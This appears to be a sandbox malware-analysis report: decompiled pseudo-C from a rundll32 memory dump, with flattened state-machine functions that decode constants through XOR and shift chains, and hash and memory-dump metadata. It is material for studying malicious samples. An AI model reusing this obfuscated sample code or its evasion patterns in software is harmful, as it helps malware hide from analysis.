                                                                                                                      				_t229 = 0x52;
                                                                                                                      				_v644 = _v644 * 0x23;
                                                                                                                      				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                      				_v636 = 0x949b2b;
                                                                                                                      				_v636 = _v636 / _t229;
                                                                                                                      				_v636 = _v636 << 4;
                                                                                                                      				_t230 = 0x48;
                                                                                                                      				_v636 = _v636 / _t230;
                                                                                                                      				_v636 = _v636 ^ 0x000805f9;
                                                                                                                      				_v652 = 0x50f951;
                                                                                                                      				_v652 = _v652 << 0xe;
                                                                                                                      				_v652 = _v652 + 0xffff7357;
                                                                                                                      				_v652 = _v652 >> 5;
                                                                                                                      				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                      				_v624 = 0xa7ee55;
                                                                                                                      				_v624 = _v624 + 0x328f;
                                                                                                                      				_t231 = 0x36;
                                                                                                                      				_v624 = _v624 / _t231;
                                                                                                                      				_v624 = _v624 + 0x3260;
                                                                                                                      				_v624 = _v624 ^ 0x000caec1;
                                                                                                                      				_v632 = 0x45b476;
                                                                                                                      				_v632 = _v632 << 0xf;
                                                                                                                      				_v632 = _v632 + 0x3fe9;
                                                                                                                      				_v632 = _v632 + 0xffffc242;
                                                                                                                      				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                      				_v576 = 0xb3f46f;
                                                                                                                      				_v576 = _v576 >> 0xe;
                                                                                                                      				_v576 = _v576 ^ 0x000becca;
                                                                                                                      				_v640 = 0x899e10;
                                                                                                                      				_v640 = _v640 << 3;
                                                                                                                      				_v640 = _v640 | 0x15c6522a;
                                                                                                                      				_v640 = _v640 >> 0xc;
                                                                                                                      				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                      				_v648 = 0x6b2405;
                                                                                                                      				_v648 = _v648 | 0xec8a856c;
                                                                                                                      				_v648 = _v648 + 0xffffe7b2;
                                                                                                                      				_v648 = _v648 >> 0xd;
                                                                                                                      				_v648 = _v648 ^ 0x000a0717;
                                                                                                                      				_v608 = 0xd62f5d;
                                                                                                                      				_v608 = _v608 + 0xffffa804;
                                                                                                                      				_v608 = _v608 >> 1;
                                                                                                                      				_v608 = _v608 ^ 0x00686b18;
                                                                                                                      				_v580 = 0x2fce72;
                                                                                                                      				_t232 = 6;
                                                                                                                      				_v580 = _v580 / _t232;
                                                                                                                      				_v580 = _v580 ^ 0x000627ef;
                                                                                                                      				_v612 = 0xa7d19a;
                                                                                                                      				_v612 = _v612 ^ 0x125f9685;
                                                                                                                      				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                      				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                      				_v656 = 0x784491;
                                                                                                                      				_v656 = _v656 >> 9;
                                                                                                                      				_v656 = _v656 | 0xfbff7fff;
                                                                                                                      				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                      				_v616 = 0xc21bdd;
                                                                                                                      				_t233 = 0x58;
                                                                                                                      				_v616 = _v616 / _t233;
                                                                                                                      				_v616 = _v616 | 0xde7eb344;
                                                                                                                      				_v616 = _v616 ^ 0xde714edb;
                                                                                                                      				_v620 = 0x22ba29;
                                                                                                                      				_v620 = _v620 + 0xc334;
                                                                                                                      				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                      				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                      				_v588 = 0x61092c;
                                                                                                                      				_v588 = _v588 | 0xfbe761ce;
                                                                                                                      				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                      				_v600 = 0xd9609d;
                                                                                                                      				_v600 = _v600 | 0x95d54fcb;
                                                                                                                      				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                      				_v592 = 0xc80f6b;
                                                                                                                      				_t234 = 0x42;
                                                                                                                      				_t252 = _v600;
                                                                                                                      				_v592 = _v592 / _t234;
                                                                                                                      				_v592 = _v592 ^ 0x0000156e;
                                                                                                                      				do {
                                                                                                                      					while(_t253 != 0x25f6a69) {
                                                                                                                      						if(_t253 == 0x9728f62) {
                                                                                                                      							_t253 = 0xea70970;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t253 == 0x9c0fe90) {
                                                                                                                      								_t250 = _v632;
                                                                                                                      								_t220 = E00688F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                      								_t252 = _t220;
                                                                                                                      								_t260 = _t260 + 0x28;
                                                                                                                      								__eflags = _t220 - 0xffffffff;
                                                                                                                      								if(__eflags != 0) {
                                                                                                                      									_t253 = 0xaccbeb9;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t253 == 0xaccbeb9) {
                                                                                                                      									_t222 = E00689350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t250 = _v616;
                                                                                                                      									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                      									_t234 = _v656;
                                                                                                                      									E00691E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                      									_t260 = _t260 + 0x20;
                                                                                                                      									goto L14;
                                                                                                                      								} else {
                                                                                                                      									if(_t253 == 0xdba0984) {
                                                                                                                      										_t224 = E0069ABD1();
                                                                                                                      										_t258 = _v572 - _v548;
                                                                                                                      										asm("sbb ecx, [esp+0x84]");
                                                                                                                      										__eflags = _v568 - _t250;
                                                                                                                      										if(__eflags >= 0) {
                                                                                                                      											if(__eflags > 0) {
                                                                                                                      												L19:
                                                                                                                      												_t227 = 1;
                                                                                                                      												__eflags = 1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t258 - _t224;
                                                                                                                      												if(_t258 >= _t224) {
                                                                                                                      													goto L19;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										_t268 = _t253 - 0xea70970;
                                                                                                                      										if(_t253 != 0xea70970) {
                                                                                                                      											goto L14;
                                                                                                                      										} else {
                                                                                                                      											_t250 = _v644;
                                                                                                                      											_t234 = _v628;
                                                                                                                      											_t226 = E0069DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
                                                                                                                      											_t260 = _t260 + 0x10;
                                                                                                                      											if(_t226 != 0) {
                                                                                                                      												_t253 = 0x9c0fe90;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L20:
                                                                                                                      						return _t227;
                                                                                                                      					}
                                                                                                                      					E0069C1EC(_v600, _v592,  &_v572);
                                                                                                                      					_pop(_t234);
                                                                                                                      					_t253 = 0xdba0984;
                                                                                                                      					L14:
                                                                                                                      					__eflags = _t253 - 0x15a60c5;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L20;
                                                                                                                      			}












































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,a$`2$?
                                                                                                                      • API String ID: 0-2087061617
                                                                                                                      • Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                      • Instruction ID: 336251c86e366cb716171f02d24cfc6fb19619779e69f2eefa1edbfb4aec287a
                                                                                                                      • Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
                                                                                                                      • Instruction Fuzzy Hash: 04A122725083419FC758CF65C48A80BFBF6FBC5758F008A1DF69996260D7B5890ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006859F2() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				intOrPtr _v1044;
                                                                                                                      				intOrPtr _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				signed int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				void* _t202;
                                                                                                                      				void* _t208;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				void* _t214;
                                                                                                                      				void* _t222;
                                                                                                                      				intOrPtr _t237;
                                                                                                                      				intOrPtr _t240;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				signed int* _t247;
                                                                                                                      
                                                                                                                      				_t247 =  &_v1140;
                                                                                                                      				_v1056 = 0x36f622;
                                                                                                                      				_v1052 = 0x8ed67e;
                                                                                                                      				_t214 = 0xf737bb2;
                                                                                                                      				_v1048 = 0x93fb3c;
                                                                                                                      				_t240 = 0;
                                                                                                                      				_v1044 = 0;
                                                                                                                      				_v1076 = 0x48eb17;
                                                                                                                      				_v1076 = _v1076 + 0x189d;
                                                                                                                      				_v1076 = _v1076 ^ 0x00442401;
                                                                                                                      				_v1100 = 0xa45863;
                                                                                                                      				_v1100 = _v1100 << 2;
                                                                                                                      				_t241 = 0x1d;
                                                                                                                      				_v1100 = _v1100 * 0x7c;
                                                                                                                      				_v1100 = _v1100 ^ 0x3e6538f4;
                                                                                                                      				_v1108 = 0x56f1ad;
                                                                                                                      				_v1108 = _v1108 | 0xbff0a597;
                                                                                                                      				_v1108 = _v1108 / _t241;
                                                                                                                      				_v1108 = _v1108 ^ 0x06946226;
                                                                                                                      				_v1132 = 0xc3fd0a;
                                                                                                                      				_v1132 = _v1132 << 8;
                                                                                                                      				_v1132 = _v1132 + 0xffff9bc2;
                                                                                                                      				_t242 = 0x18;
                                                                                                                      				_v1132 = _v1132 / _t242;
                                                                                                                      				_v1132 = _v1132 ^ 0x0821d39f;
                                                                                                                      				_v1068 = 0xc66dea;
                                                                                                                      				_v1068 = _v1068 + 0xffff0514;
                                                                                                                      				_v1068 = _v1068 ^ 0x00c0919e;
                                                                                                                      				_v1136 = 0x72811d;
                                                                                                                      				_v1136 = _v1136 ^ 0x5ea2c622;
                                                                                                                      				_t243 = 0x5d;
                                                                                                                      				_v1136 = _v1136 * 0x4f;
                                                                                                                      				_v1136 = _v1136 * 0x41;
                                                                                                                      				_v1136 = _v1136 ^ 0xd3c4c324;
                                                                                                                      				_v1096 = 0x2e25e6;
                                                                                                                      				_v1096 = _v1096 ^ 0xbdbebaf9;
                                                                                                                      				_v1096 = _v1096 ^ 0xbd932287;
                                                                                                                      				_v1060 = 0x3d42d8;
                                                                                                                      				_v1060 = _v1060 << 6;
                                                                                                                      				_v1060 = _v1060 ^ 0x0f5887f2;
                                                                                                                      				_v1116 = 0xec9c1f;
                                                                                                                      				_v1116 = _v1116 >> 1;
                                                                                                                      				_v1116 = _v1116 + 0xcef9;
                                                                                                                      				_v1116 = _v1116 ^ 0x0078140d;
                                                                                                                      				_v1084 = 0xf6a299;
                                                                                                                      				_v1084 = _v1084 >> 9;
                                                                                                                      				_v1084 = _v1084 ^ 0x00023821;
                                                                                                                      				_v1124 = 0xf6e97d;
                                                                                                                      				_v1124 = _v1124 + 0xffff8c4c;
                                                                                                                      				_v1124 = _v1124 / _t243;
                                                                                                                      				_v1124 = _v1124 | 0xda1c672f;
                                                                                                                      				_v1124 = _v1124 ^ 0xda1e012d;
                                                                                                                      				_v1120 = 0x9bdb66;
                                                                                                                      				_v1120 = _v1120 * 0x47;
                                                                                                                      				_v1120 = _v1120 + 0xdb13;
                                                                                                                      				_v1120 = _v1120 * 0x64;
                                                                                                                      				_v1120 = _v1120 ^ 0xe2e3c71f;
                                                                                                                      				_v1112 = 0x9fec0e;
                                                                                                                      				_v1112 = _v1112 << 0xc;
                                                                                                                      				_v1112 = _v1112 | 0xd7512eb2;
                                                                                                                      				_v1112 = _v1112 ^ 0xffdc645c;
                                                                                                                      				_v1104 = 0xc74eee;
                                                                                                                      				_v1104 = _v1104 + 0x930c;
                                                                                                                      				_v1104 = _v1104 ^ 0x28280d38;
                                                                                                                      				_v1104 = _v1104 ^ 0x28ef0d26;
                                                                                                                      				_v1064 = 0xc36095;
                                                                                                                      				_v1064 = _v1064 | 0x2d8f7273;
                                                                                                                      				_v1064 = _v1064 ^ 0x2dcb1501;
                                                                                                                      				_v1140 = 0xa3c477;
                                                                                                                      				_v1140 = _v1140 ^ 0xb16da3ec;
                                                                                                                      				_v1140 = _v1140 ^ 0x8917fdcb;
                                                                                                                      				_v1140 = _v1140 >> 0xe;
                                                                                                                      				_v1140 = _v1140 ^ 0x000e0fa0;
                                                                                                                      				_v1128 = 0x58136;
                                                                                                                      				_v1128 = _v1128 << 6;
                                                                                                                      				_v1128 = _v1128 << 0x10;
                                                                                                                      				_v1128 = _v1128 + 0xffffe729;
                                                                                                                      				_v1128 = _v1128 ^ 0x4d79f308;
                                                                                                                      				_v1072 = 0x735c84;
                                                                                                                      				_t244 = 0x7f;
                                                                                                                      				_v1072 = _v1072 / _t244;
                                                                                                                      				_v1072 = _v1072 ^ 0x0002b970;
                                                                                                                      				_v1080 = 0x91f75b;
                                                                                                                      				_v1080 = _v1080 + 0xffffc39e;
                                                                                                                      				_v1080 = _v1080 ^ 0x009f463e;
                                                                                                                      				_v1088 = 0xdf4dcf;
                                                                                                                      				_v1088 = _v1088 | 0x05792173;
                                                                                                                      				_v1088 = _v1088 ^ 0x05f69aec;
                                                                                                                      				_v1092 = 0xf44447;
                                                                                                                      				_v1092 = _v1092 * 0x78;
                                                                                                                      				_v1092 = _v1092 ^ 0x728504a1;
                                                                                                                      				do {
                                                                                                                      					while(_t214 != 0x89b0ee) {
                                                                                                                      						if(_t214 == 0x291094f) {
                                                                                                                      							E00683C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
                                                                                                                      						} else {
                                                                                                                      							if(_t214 == 0x6a25a64) {
                                                                                                                      								E0069DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
                                                                                                                      								_t247 =  &(_t247[4]);
                                                                                                                      								_t214 = 0xe0c4196;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t214 == 0xe0c4196) {
                                                                                                                      									_push(_v1096);
                                                                                                                      									_push(_v1136);
                                                                                                                      									_t208 = E0069DCF7(_v1068, 0x681000, __eflags);
                                                                                                                      									_pop(_t222);
                                                                                                                      									_t209 =  *0x6a3e10; // 0x0
                                                                                                                      									_t237 =  *0x6a3e10; // 0x0
                                                                                                                      									E006847CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
                                                                                                                      									E0068A8B0(_v1112, _t208, _v1104);
                                                                                                                      									_t247 =  &(_t247[9]);
                                                                                                                      									_t214 = 0x89b0ee;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t214 != 0xf737bb2) {
                                                                                                                      										goto L10;
                                                                                                                      									} else {
                                                                                                                      										_t214 = 0x6a25a64;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L13:
                                                                                                                      						return _t240;
                                                                                                                      					}
                                                                                                                      					_push(_v1128);
                                                                                                                      					_push( &_v1040);
                                                                                                                      					_push(_v1140);
                                                                                                                      					_t202 = E006A13AD(_v1064,  &_v520, __eflags);
                                                                                                                      					_t247 =  &(_t247[3]);
                                                                                                                      					__eflags = _t202;
                                                                                                                      					_t240 =  !=  ? 1 : _t240;
                                                                                                                      					_t214 = 0x291094f;
                                                                                                                      					L10:
                                                                                                                      					__eflags = _t214 - 0xb653a05;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L13;
                                                                                                                      			}










































                                                                                                                      0x00685da5
                                                                                                                      0x00685da5
                                                                                                                      0x00685da5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &($&($%.
                                                                                                                      • API String ID: 0-466442461
                                                                                                                      • Opcode ID: 805e37f5e4878e0a9a88b438be5a4ea332ee7e2362672b8cf53149aa0cd22cbc
                                                                                                                      • Instruction ID: 94bc709f51e2631d4b964d0e96b271fa5dc3664ee6cc9c10e45c2ca3dfb87ce2
                                                                                                                      • Opcode Fuzzy Hash: 805e37f5e4878e0a9a88b438be5a4ea332ee7e2362672b8cf53149aa0cd22cbc
                                                                                                                      • Instruction Fuzzy Hash: 70A130B11083819FC798DF26C58941BFBF2FBC4758F108A1DF5A696220D7B58A0ACF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E006A13AD(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t197;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t226;
                                                                                                                      				void* _t236;
                                                                                                                      				void* _t245;
                                                                                                                      				void* _t246;
                                                                                                                      
                                                                                                                      				_t245 = _t246 - 0x6c;
                                                                                                                      				_push( *((intOrPtr*)(_t245 + 0x7c)));
                                                                                                                      				_push( *((intOrPtr*)(_t245 + 0x78)));
                                                                                                                      				_push( *((intOrPtr*)(_t245 + 0x74)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t197);
                                                                                                                      				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
                                                                                                                      				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
                                                                                                                      				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
                                                                                                                      				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
                                                                                                                      				 *(_t245 + 0x38) = 0xf8747;
                                                                                                                      				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
                                                                                                                      				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
                                                                                                                      				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
                                                                                                                      				 *(_t245 + 0x4c) = 0x1e90b9;
                                                                                                                      				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
                                                                                                                      				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
                                                                                                                      				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
                                                                                                                      				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
                                                                                                                      				 *(_t245 + 0x54) = 0x94d35;
                                                                                                                      				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
                                                                                                                      				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
                                                                                                                      				 *(_t245 + 0x40) = 0x2ce8ae;
                                                                                                                      				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
                                                                                                                      				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
                                                                                                                      				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
                                                                                                                      				 *(_t245 + 0x58) = 0x43e6f3;
                                                                                                                      				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
                                                                                                                      				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
                                                                                                                      				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
                                                                                                                      				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
                                                                                                                      				 *(_t245 + 0x24) = 0x72d00d;
                                                                                                                      				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
                                                                                                                      				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
                                                                                                                      				 *(_t245 + 0x34) = 0x43d743;
                                                                                                                      				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
                                                                                                                      				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
                                                                                                                      				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
                                                                                                                      				 *(_t245 + 0x2c) = 0xa6821;
                                                                                                                      				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
                                                                                                                      				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
                                                                                                                      				 *(_t245 + 0x60) = 0x210575;
                                                                                                                      				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
                                                                                                                      				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
                                                                                                                      				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
                                                                                                                      				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
                                                                                                                      				 *(_t245 + 0x44) = 0xde4c18;
                                                                                                                      				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
                                                                                                                      				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
                                                                                                                      				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
                                                                                                                      				 *(_t245 + 0x50) = 0xde2575;
                                                                                                                      				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
                                                                                                                      				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
                                                                                                                      				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
                                                                                                                      				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
                                                                                                                      				 *(_t245 + 0x18) = 0x52bd7f;
                                                                                                                      				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
                                                                                                                      				 *(_t245 + 0x3c) = 0xe72c64;
                                                                                                                      				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
                                                                                                                      				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
                                                                                                                      				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
                                                                                                                      				 *(_t245 + 0x48) = 0x12926a;
                                                                                                                      				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
                                                                                                                      				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
                                                                                                                      				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
                                                                                                                      				 *(_t245 + 0x5c) = 0xf2f3b3;
                                                                                                                      				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
                                                                                                                      				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
                                                                                                                      				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
                                                                                                                      				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
                                                                                                                      				 *(_t245 + 0x64) = 0x250dfe;
                                                                                                                      				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
                                                                                                                      				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
                                                                                                                      				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
                                                                                                                      				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
                                                                                                                      				 *(_t245 + 0x68) = 0x1b0053;
                                                                                                                      				_t226 = 0x44;
                                                                                                                      				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
                                                                                                                      				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
                                                                                                                      				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
                                                                                                                      				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
                                                                                                                      				 *(_t245 + 0x30) = 0x848c63;
                                                                                                                      				_t142 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                      				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
                                                                                                                      				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
                                                                                                                      				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
                                                                                                                      				 *(_t245 + 0x28) = 0x69c662;
                                                                                                                      				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
                                                                                                                      				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
                                                                                                                      				 *(_t245 + 0x20) = 0x70b48b;
                                                                                                                      				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
                                                                                                                      				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
                                                                                                                      				 *(_t245 + 0x1c) = 0x80403c;
                                                                                                                      				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
                                                                                                                      				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
                                                                                                                      				_push( *(_t245 + 0x58));
                                                                                                                      				_push( *(_t245 + 0x40));
                                                                                                                      				_t236 = 0x1e;
                                                                                                                      				E00684B61(_t142, _t236);
                                                                                                                      				_t166 = _t245 - 0x220; // 0x12da7b13
                                                                                                                      				E00684B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
                                                                                                                      				_t169 = _t245 - 0x428; // 0x12da790b
                                                                                                                      				E00684B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
                                                                                                                      				_t171 = _t245 - 0x220; // 0x12da7b13
                                                                                                                      				E00683BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
                                                                                                                      				_t176 = _t245 - 0x428; // 0x12da790b
                                                                                                                      				E00683BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
                                                                                                                      				_t183 = _t245 - 0x18; // 0x12da7d1b
                                                                                                                      				 *(_t245 - 0x14) =  *(_t245 + 0x38);
                                                                                                                      				_t185 = _t245 - 0x220; // 0x12da7b13
                                                                                                                      				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
                                                                                                                      				_t187 = _t245 - 0x428; // 0x12da790b
                                                                                                                      				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
                                                                                                                      				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
                                                                                                                      				_t222 = E00684DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
                                                                                                                      				asm("sbb eax, eax");
                                                                                                                      				return  ~_t222 + 1;
                                                                                                                      			}









                                                                                                                      0x006a1528
                                                                                                                      0x006a152f
                                                                                                                      0x006a1536
                                                                                                                      0x006a153d
                                                                                                                      0x006a1544
                                                                                                                      0x006a1548
                                                                                                                      0x006a154f
                                                                                                                      0x006a1556
                                                                                                                      0x006a155a
                                                                                                                      0x006a1561
                                                                                                                      0x006a1568
                                                                                                                      0x006a156f
                                                                                                                      0x006a1576
                                                                                                                      0x006a157a
                                                                                                                      0x006a1581
                                                                                                                      0x006a158a
                                                                                                                      0x006a1591
                                                                                                                      0x006a159e
                                                                                                                      0x006a159f
                                                                                                                      0x006a15a2
                                                                                                                      0x006a15a6
                                                                                                                      0x006a15ad
                                                                                                                      0x006a15b4
                                                                                                                      0x006a15c0
                                                                                                                      0x006a15c3
                                                                                                                      0x006a15c6
                                                                                                                      0x006a15cd
                                                                                                                      0x006a15d4
                                                                                                                      0x006a15df
                                                                                                                      0x006a15e2
                                                                                                                      0x006a15e9
                                                                                                                      0x006a15f0
                                                                                                                      0x006a15f7
                                                                                                                      0x006a15fe
                                                                                                                      0x006a1609
                                                                                                                      0x006a160c
                                                                                                                      0x006a1613
                                                                                                                      0x006a1616
                                                                                                                      0x006a161b
                                                                                                                      0x006a161c
                                                                                                                      0x006a1629
                                                                                                                      0x006a1632
                                                                                                                      0x006a163f
                                                                                                                      0x006a1648
                                                                                                                      0x006a164d
                                                                                                                      0x006a1661
                                                                                                                      0x006a1666
